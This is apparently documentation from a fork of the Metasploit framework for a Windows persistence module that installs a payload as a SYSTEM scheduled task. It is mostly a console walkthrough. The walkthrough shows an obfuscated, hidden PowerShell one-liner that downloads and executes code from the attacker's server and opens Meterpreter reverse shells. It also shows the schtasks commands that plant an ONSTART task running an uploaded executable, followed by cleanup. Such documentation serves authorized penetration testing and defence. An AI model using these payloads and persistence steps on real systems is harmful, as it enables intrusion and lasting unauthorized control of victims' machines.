adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1e4527d8338b4f431cdc8011c052d3744e29d7ed
metasploit-gs/documentation/modules/exploit/windows/persistence/task_scheduler.md
T
h00die c210a897ac windows persistence: task scheduler
2025-10-26 16:17:16 -04:00

141 lines
6.4 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module establishes persistence by creating a scheduled task to run a payload.
## Verification Steps
1. get session on target with admin/system privs
2. `use exploit/windows/persistence/task_scheduler`
3. `set payload <payload>`
4. `set lport <lport>`
5. `set lhost <lhost>`
6. `exploit`
## Options
### PAYLOAD_NAME
Name of payload file to write. Random string as default.
### TASK_NAME
The name of task. Random string as default.
## Advanced Options
### ScheduleType
Schedule frequency for the new created task.
Options are: `MINUTE`, `HOURLY`, `DAILY`, `WEEKLY`, `MONTHLY`,
`ONCE`, `ONSTART`, `ONLOGON`, `ONIDLE`.
### ScheduleModifier
Schedule frequency modifier to define the amount of `ScheduleType`.
This defines the amount of minutes/hours/days/weeks/months,
depending on the ScheduleType value. When `ONIDLE` type is used,
this represents how many minutes the computer is idle before
the task starts. This value is not used with `ONCE`, `ONSTART` and
`ONLOGON` types.
## Scenarios
### Windows 10 1909 (10.0 Build 18363)
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 2.2.2.2
lhost => 2.2.2.2
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4449
[*] Using URL: http://2.2.2.2:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABhADYAeQA3AFUAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAYQA2AHkANwBVAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAYQA2AHkANwBVAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwB0AGIARwBHAGMAVgBOAEoATgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
msf exploit(multi/script/web_delivery) >
[*] 1.1.1.1 web_delivery - Powershell command length: 3659
[*] 1.1.1.1 web_delivery - Delivering Payload (3659 bytes)
[*] Sending stage (230982 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4449 -> 1.1.1.1:49934) at 2025-10-26 16:11:31 -0400
```
Session info
```
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
```
Persistence
```
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/task_scheduler
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/task_scheduler) > set session 1
session => 1
msf exploit(windows/persistence/task_scheduler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/task_scheduler) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444
msf exploit(windows/persistence/task_scheduler) > [*] Running automatic check ("set AutoCheck false" to disable)
[*] [Task Scheduler] Trying to get SYSTEM privilege
[*] [Task Scheduler] Got SYSTEM privilege
[+] The target appears to be vulnerable. Likely exploitable
[*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Local\Temp\CLxSZIsj.exe
[*] Creating task: svuJIW
[*] [Task Scheduler] executing command: schtasks /create /tn "svuJIW" /tr "C:\Users\windows\AppData\Local\Temp\CLxSZIsj.exe" /sc ONSTART /ru SYSTEM /f
[*] Starting task: svuJIW
[*] [Task Scheduler] executing command: schtasks /run /tn svuJIW
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:49935) at 2025-10-26 16:12:29 -0400
```
Cleanup
```
msf exploit(windows/persistence/task_scheduler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc)> execute -f cmd.exe -a "/c schtasks /delete /tn svuJIW /f"
Process 560 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc)> rm C:/Users/windows/AppData/Local/Temp/CLxSZIsj.exe
[-] stdapi_fs_delete_file: Operation failed: Access is denied.
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink